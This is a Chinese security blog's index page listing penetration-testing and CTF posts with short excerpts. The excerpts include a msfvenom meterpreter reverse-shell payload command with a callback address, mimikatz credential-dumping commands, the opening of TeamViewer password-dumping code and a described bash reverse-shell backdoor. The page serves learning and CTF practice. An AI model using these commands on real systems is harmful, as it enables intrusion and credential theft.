自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

大方子

记录着自己的见闻【ms08067】【贝塔安全实验室】 ***有任何问题 请留言私信 空闲时间统一回复***

  • 博客(43)
  • 收藏
  • 关注

转载 MSF之persistence权限维持

首先,我们先生成一个 PAYLOAD : msfpayload(msfvenom) windows/meterpreter/reverse_tcp LHOST=192.168.2.133 LPORT=1218 X >xx.exe接着,我们来配置一个反弹会话的监听处理:use exploit/multi/handlerset payload windows/meterp...

2018-10-18 15:27:37 2471

转载 获取运行中的TeamViewer的账号和密码

Dumps TeamViewer ID,Password and account settings from a running TeamViewer instance by enumerating child windows.#define WIN32_LEAN_AND_MEAN#include <windows.h>#include <iostream>#p...

2018-10-17 15:08:11 6398 1

原创 在Metasploit中使用数据库

将Metasploit与数据库建立连接可以加快搜索的速度,缩短响应的时间。如图是没有建立与数据库连接时候的情形  如果需要使用数据库,需要先启动Metasploit的数据库服务root@kali:~# service postgresql startroot@kali:~# msfdb init 然后我们启动msfconsole输入db_status ...

2018-10-15 13:55:04 1687

原创 思科模拟器跨交换机配置vlan

网络拓扑图搭建 如图所示,pc0——-switch0/1(vlan2)pc1——-switch0/2(vlan3)pc2——switch1/1 (vlan2)pc3——switch1/2(vlan3)然后交换机之间使用交叉线联通了他们的第三个接口 最后实现就是   在switch0里的vlan2 可以跟switch的vlan2可以通讯在switch0...

2018-10-14 22:45:49 9478

转载 nmap 查看主机上开放的端口

作用:检测网络上的主机检测主机上开放的端口检测操作系统,硬件地址,以及软件版本检测脆弱性的漏洞(Nmap的脚本)扫描方式:1. -sS     Tcp SYN Scan  不需要三次握手,速度快优点:半开放扫描,Nmap发送SYN包到远程主机,但是它不会产生任何会话,目标主机几乎不会把连接记入系统日志。(防止对方判断为扫描攻击),扫描速度快,效率高,在工作中使用频率最高 ...

2018-10-14 10:21:29 4474

转载 linux下字典生成工具-crunch与rtgen

所谓的密码字典主要是配合密码破解软件所使用,密码字典里包括许多人们习惯性设置的密码。这样可以提高密码破解软件的密码破解成功率和命中率,缩短密码破解的时间。当然,如果一个人密码设置没有规律或很复杂,未包含在密码字典里,这个字典就没有用了,甚至会延长密码破解所需要的时间。在Linux中有Crunch和rtgen两个工具,可以来创建密码字典。为方便用户的使用,本节将介绍这两个工具的使用方法。1 .C...

2018-10-13 22:04:14 1945

转载 记一道CTF 中遇到的SQL注入新型万能密码问题

0x00. 引言我们平时遇到的SQL注入万能密码都是形如admin' or '1'='1, 这种使用or 关键字使得查询结果永真,或者形如:' UNION Select 1,1,1 FROM admin Where ''=',这种使用union使得查询结果永真,但是有一次我在CTF的比赛中遇到的SQL注入问题,使用这两种万能密码都不好使,不管怎么变换形式,都不好使,显然是or和union ...

2018-10-09 11:45:07 8363 2

转载 上传JSPX文件绕过网站后缀名检查

这几天在做渗透测试的时候,发现一个有趣的东西。目标有上传漏洞,但是无论如何都没法让webshell执行。访问任何jsp文件都跳到登录的地 方,然后尝试过变换jsp的大小写,虽然不跳了,但是直接不解析,利用apache的解析漏洞上传文件,也不解析。后来只能放弃…今天在工作中做另外一个站的渗透测试的时候,有个很特别的东西,JSPX,发现可以解析。然后去找了下是否apache默认解析jspx的文件。...

2018-10-08 18:49:46 3534 1

转载 CVE-2018-4878的复现

前言:CVE-2018-4878利用flash的漏洞来进行攻击,如果受害者的flash版本在28.0.0.137及其之前,那么攻击者可以通过诱使受害者点击链接访问特定网页来控制受害者的电脑。1 漏洞影响范围Flash Player28.0.0.137及以前的所有版本2 漏洞复现2.1 测试环境攻击机:kali2017靶机:win7_x64+IE8+FLASH_playe...

2018-10-07 10:38:20 4341

转载 记一次初级渗透测试模拟过程

0x00 前言      网络安全攻防赛是一种国际流行的竞技模式,自2014年在国内升温,发展到现在,深受各大高校和安全企业的青睐。参赛者在竞技过程中能够更大的限度的收获专业知识、激发潜能。为了让更多人切身体会到网络安全攻防赛,这次我们模拟了一次初级渗透测试攻防赛的过程。 0x01 模拟环境 实验环境:· 外网1: 192.168.15.53· 外网2: 192.168...

2018-10-07 00:32:53 1283

转载 web狗要懂的内网端口转发

先区分正向代理和反向代理(自己的理解)A——B——CA对C的请求,B作为代理,代替A去访问C,并将结果返回给A,则B是正向代理B主动与A的8888端口建立连接,并将A:8888的访问转为对C:80的访问,结果返回给A,则B是反向代理反向代理的好处:当AB之间有防火墙,不允许A连B,但是允许B连A开始实验A(root@192.168.168.1) (kali,具有完备的攻击...

2018-10-07 00:27:32 1881

转载 phpmyadmin通过日志文件拿webshell

该方法非原创。只是给大家分享一下姿势。如果知道得就当复习了,不知道得就捣鼓捣鼓。前提:条件是root用户。思路:就是利用mysql的一个日志文件。这个日志文件每执行一个sql语句就会将其执行的保存。我们将这个日志文件重命名为我们的shell.php然后执行一条sql带一句话木马的命令。然后执行菜刀连接之!要先把general log设置为ON然后将文件修改日志文件名修改。...

2018-10-06 23:51:00 2129

转载 MS15-051 修正版Exploit(Webshell可用)

MS15-051简介:Windows 内核模式驱动程序中的漏洞可能允许特权提升 (3057191) , 如果攻击者在本地登录并可以在内核模式下运行任意代码,最严重的漏洞可能允许特权提升。 攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。 攻击者必须拥有有效的登录凭据并能本地登录才能利用此漏洞。 远程或匿名用户无法利用此漏洞。官方表示该漏洞影响的操作系统有:Wi...

2018-10-06 23:40:18 1262

转载 阳光保险集团java反序列化命令执行两枚打包(写shell教程Linux)

 漏洞标题 阳光保险集团java反序列化命令执行两枚打包(写shell教程Linux) 相关厂商 阳光保险集团 漏洞作者 进击的zjx 提交时间 2015-12-14 23:01 公开时间 2016-01-28 17:10 漏洞类型 命令执行 危害等级 高 自评Rank 15 漏洞状态 厂商已经确认 Ta...

2018-10-06 22:24:01 578

转载 CVE-2016-5195:Linux内核通杀提权漏洞预警

Linux内核(英语:Linux kernel),是一种计算机操作系统内核,以C语言和汇编语言写成,匹配POSIX标准,以GNU通用公共许可证发布。——来自于维基百科漏洞危害:低权限用户可以利用该漏洞修改只读内存,进而执行任意代码获取 root 权限。影响范围:该漏洞影响所有 Linux Kernel >= 2.6.22的版本。2.6.22 是 2007 年发...

2018-10-06 22:18:36 1204

转载 UEditor .net版本 getshell

原文地址:http://www.nsoad.com/Article/Vulnerabilityanalysis/20180823/1218.html索马里的乌贼 • 2018-08-23 22:06:29发布时间:2018-08-03公开时间:2018-08-21漏洞类型:逻辑漏洞危害等级:高漏洞编号:xianzhi-2018-08-16052905(不收取 驳回)测试版本:gi...

2018-10-06 22:09:55 2045

转载 Linux后门整理合集(脉搏推荐)

原文地址:https://www.secpulse.com/archives/59674.html Unix Bash 远控后门简介利用 Unix/Linux 自带的 Bash 和 Crond 实现远控功能,保持反弹上线到公网机器。利用方法先创建 /etc/xxxx 脚本文件(名字自己改),利用该脚本进行反弹。以下脚本代表全自动反弹到 8.8.8.8 的 53 端口。n...

2018-10-06 22:03:45 6353

转载 我是如何一步一步搞定小区的安防系统

前言博主从小就是一个喜欢把事情简单化的男人,但是现实总是在不经意间给你太多的惊喜,比如不停的搬家。博主从大学毕业到现在前前后后凑足了10次搬家运动,终于在第10次搬家的时候搬进了真正属于自己的房子。15年底趁着房价最低的时候捡了个漏,一咬牙买下一套两房半小居室,17年交房装修,终于在18年初计划搬进去住,博主我终于再也不用搬家了,心情愉悦,住进去之后就开始忙乎各种琐事,所以这几个月是非...

2018-10-06 21:45:57 2641 3

原创 VulnCTF的练习教室v1.0-------WEB-----------第五题【ereg()截断】

   题目: 由代码可知,正则进行匹配出现不属于[a-z,A-Z,0-9]范围内的元素就会输出报错文字,但是下面的语句又是通过strpos来查询指定字符串出现的位置,但是匹配的又是 ——,如果是其他的情况的话就会输出Invalid password 通过经验这里我直接通过传入一个数组直接绕过 ...

2018-10-05 23:04:24 612

原创 VulnCTF的练习教室v1.0-------WEB-----------第四题【绕过and后面的is_numeric()】

====================================个人收获:1.在php中赋值运算比AND和OR高,但是低于&&和||,利用这个特性可以绕过  ===================================== 题目: 查看下源代码然后我们传入a和b,直接得到flag 这题就是送分题,主要看下...

2018-10-05 22:54:21 2301

转载 CTF类型网站收集,给准备入坑的基友

看到坛里有基友想学习CTF,就做个征集,看各位基佬手里都有哪些干货,分享一下,让新人少走弯路!http://www.hetianlab.com/CTFrace.htmlhttp://ctf.idf.cnhttp://www.shiyanbar.com/ctf/indexhttps://www.hackfun.orghttp://hackinglab.cn/http://www.52pojie.cn...

2018-10-05 22:40:23 968

转载 纯干货!一个白帽子挖漏洞经验细致分享

不知道是不是很多人和我一样,每天刷着漏洞,看着自己的排名一位一位的往上提升,但是,但是。总感觉怪怪的,为什么别人刷的漏洞都是现金,而自己刷的漏洞都是给库币。别人一天为什么提交那么多漏洞,都是高危。而自己挖了一天也不见得会超过五个十个之类的,还被评为低危。为什么?你问我为什么,难道你心里还没有一点数么? 讲讲自己的套路!看的上的可以借鉴,看不上的,请自便吧!请注意,以下所涉及的工具,请百...

2018-10-05 22:38:47 26653 2

转载 记一次内网渗透

前言一客户,指定要给其公司做安全测试可从网络层面做,也可以人肉社工 :-)对于一个小清新来说,怎么可以做人肉社工呢,要是把对方公司的妹子骗走怎么办,于是果断交给单身的同事去做了。自己默默的看站,客户扔过来的一个域名,域名是a.com,其他什么信息都没有。信息收集Google搜了下,得到了一批二级域名;开起kali用fierce来一轮域名枚举,成功枚举出某域名下的子域名列表。...

2018-10-05 15:25:16 1191

转载 Mimikatz 使用小技巧

1.记录 Mimikatz输出:C:\>mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit && dir2.将输出导入到本地文件:C:\>mimikatz.exe ""privilege::debug"" &quo

2018-10-05 15:18:25 2696

转载 mimikatz实战域渗透抓取域控管理员密码

实验环境:攻击机:Kali靶 机:Windows server 2012工具:mimikatz2.1这里实验所需要的工具我会上传到我的资源里面,有需要的小伙伴可以自己去下载条件:靶机获取到shell之后必须是管理员的权限步骤:**我这里攻击利用的msf里面的regsvr32_applocker_bypass_server模块 利用的是注册表漏洞** ps:其实这个也不远是...

2018-10-05 14:43:25 3320 1

原创 VulnCTF的练习教室v1.0-------WEB-----------第三题【弱类型==|===比较】

 题目:查看网页源码 需要我们传入参数name和password 在这里我们看到了sha1算法,就要想到它跟MD5一样在对数组进行运算的时候返回的是NULL这里还要说下==和===的区别:1.=== 在进行比较的时候,会先判断两种字符串的类型是否相等,再比较。2. == 在进行比较的时候,会先将字符串类型转化成相同,再比较。那么我们都把name和passwo...

2018-10-05 09:31:12 772

转载 CTF比赛中SQL注入的一些经验总结【含个人笔记】

============================================================自己用来测试这篇文章的数据:=========================================================== ctf中sql注入下的一些小技巧最近花了一点时间总结了各大平台中注入的trick,自己还是太菜了,多半都得看...

2018-10-05 00:20:44 5273

转载 CTF中常见Web源码泄露总结

0x01 .hg源码泄漏漏洞成因:  hg init的时候会生成.hg<span class="pln">e</span><span class="pun">.</span><span class="pln">g</span><span class=&qu

2018-10-04 15:22:36 2236

原创 VulnCTF的练习教室v1.0-------WEB-----------第二题【PHP黑魔法 | strcmp】

========================个人收获:1.通过数组绕过strcmp  ==========================  题目:由题目给的错误信息知道,需要传入的参数password 然后试着传入password[]=1    把password当作数组传入得到flag 原理解释: 测试代码:...

2018-10-04 11:23:20 534

转载 CTF web总结

本文链接:http://blog.csdn.net/u012763794/article/details/50959166本文根据自己的做题经验及各大练习平台不断更新,若我最近懒了,没怎么更新,请在下面提醒我或鼓励我仅作为自己的笔记及刚入门的童鞋,大牛勿喷基础篇 1.直接查看源代码 http://lab1.xseclab.com/base1_4a4d993ed7bd7d...

2018-10-04 11:11:44 25582 1

原创 VulnCTF的练习教室v1.0-------WEB-----------第一题【LFI | 伪协议】

项目地址:https://github.com/jianmou/VulnCTF============================个人收获:1.利用PHP内置协议直接读取网页代码 ==============================  题目: 我们查看下网页源码通过代码发现是文件包含。 我们把url改为http://local...

2018-10-04 10:49:17 980

转载 【CTF题】使用文件包含漏洞读取网页代码

【CTF题】使用文件包含漏洞读取网页代码 按照我的理解文件包含漏洞是指网页后端php(或其他)代码中使用了include等文件包含语句,而且所包含的文件由变量控制,恰恰此变量又能通过GET或POST等方式进行修改所造成的。1.直接包含内有运行代码的文件比如有一index.php<?php include $_GET['file'];?>那么就可以通过抓包...

2018-10-04 10:42:17 6962

转载 脏牛提权复现CVE-2016-5195

poc下载:https://github.com/FireFart/dirtycow一.这里小伙子用的是centos 6,内核版2.6.32,查看版本命令uname -a可以看到现在是一个普通用户admin二.打开/etc/passwd查看管理员用户,cat /etc/passwd超级管理员是root三.利用gcc编译dirty.c文件,gcc -pthread dir...

2018-10-04 01:05:28 4991

转载 SearchSploit漏洞查找工具使用指南

什么是SearchSploit:“searchsploit”是一个用于Exploit-DB的命令行搜索工具,它还允许你随身带一份Exploit-DB的副本。SearchSploit为您提供了在本地保存的存储库中执行详细的离线搜索的能力。这种能力特别适用于在没有互联网接入的情况下对网络进行安全评估。许多漏洞都包含了二进制文件的链接,这些文件不包含在标准存储库中,但可以在我们的Exploit-...

2018-10-04 00:59:04 7649 1

转载 Linux提权思路+实战【很不错的文章】

Linux提权思路前言首先关于Linux提权我们得先明白几个概念。linux发行版本是我们常说的Linux操作系统,也即是由Linux内核与各种常用软件的集合产品,全球大约有数百款的Linux系统版本,每个系统版本都有自己的特性和目标人群, 例如:CentOS redhat ubuntu kalilinux内核Linux系统内核指的是一个由Linus Torvald...

2018-10-04 00:53:52 28304 2

转载 内网渗透利器–reDuh(webshell跳板)简单使用说明

国外大牛的作品,偶顺手写了个使用说明。E文好的看原文  http://www.sensepost.com/research/reDuh/这个工具可以把内网服务器的端口通过http/https隧道转发到本机,形成一个连通回路。用于目标服务器在内网或做了端口策略的情况下连接目标服务器内部开放端口。本机——-客户端———(http隧道)———–服务端——————内网服务器服务端是个websh...

2018-10-03 11:33:34 2828

转载 内网渗透之reGeorg+Proxifier

0x00 前言遇到内网环境,防火墙DMZ区域映射外网端口80,使用常规lcx等反弹工具也会被各种安全软件拦截,尝试各自提权无果,这个时候就需要一款内网代理和端口转发工具,穿越防火墙的阻挡直连内网。 0x01 正向代理和反向代理     简单区分一下正向代理和反向代理1、正向代理,是一个位于客户端和原始服务器之间的服务器,为了从原始服务器取得内容,客户端向代理发送一个请求并指定目...

2018-10-03 11:24:33 5919

转载 ProxyChains实现自动添加代理逃避检测

使用爬虫爬取网站或者使用扫描器扫描目标时经常会遇到扫描频率较为频繁导致IP被封或者限制访问的情况,这时候我们就需要考虑利用IP代理的方式不断的变换IP进行爬虫和扫描,从而逃避目标端的检测。这里介绍一款代理工具ProxyChains。ProxyChains是一个开源代理工具,能够强制使任何应用的TCP连接使用SOCKS4,SOCKS或者HTTP(S)代理进行连接。首先简单介绍一下ProxyCha...

2018-10-03 10:39:54 4554

转载 Docker Remote api在安全中的应用杂谈

注:本文为“小米安全中心”原创,作者: netxfly  ,转载请联系“小米安全中心”概述众所周知,Docker daemon默认是监听在unix socket上的,如unix:///var/run/docker.sock。官方还提供一个Rustful api接口,允许通过TCP远程访问Docker,例如执行以下启动参数可以让docker监听在本地所有地址的2375端口上:doc...

2018-10-02 23:44:30 1884

原创 【Vulnhub系列】docker_containement

===========================个人收获:1.利用reGeorg+Proxifier进行内网渗透2.学会wpscan3.学会了Docker Remote api=============================下载地址:https://download.vulnhub.com/vulnerabledocker/靶机总共...

2018-10-02 23:40:30 1464 7

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除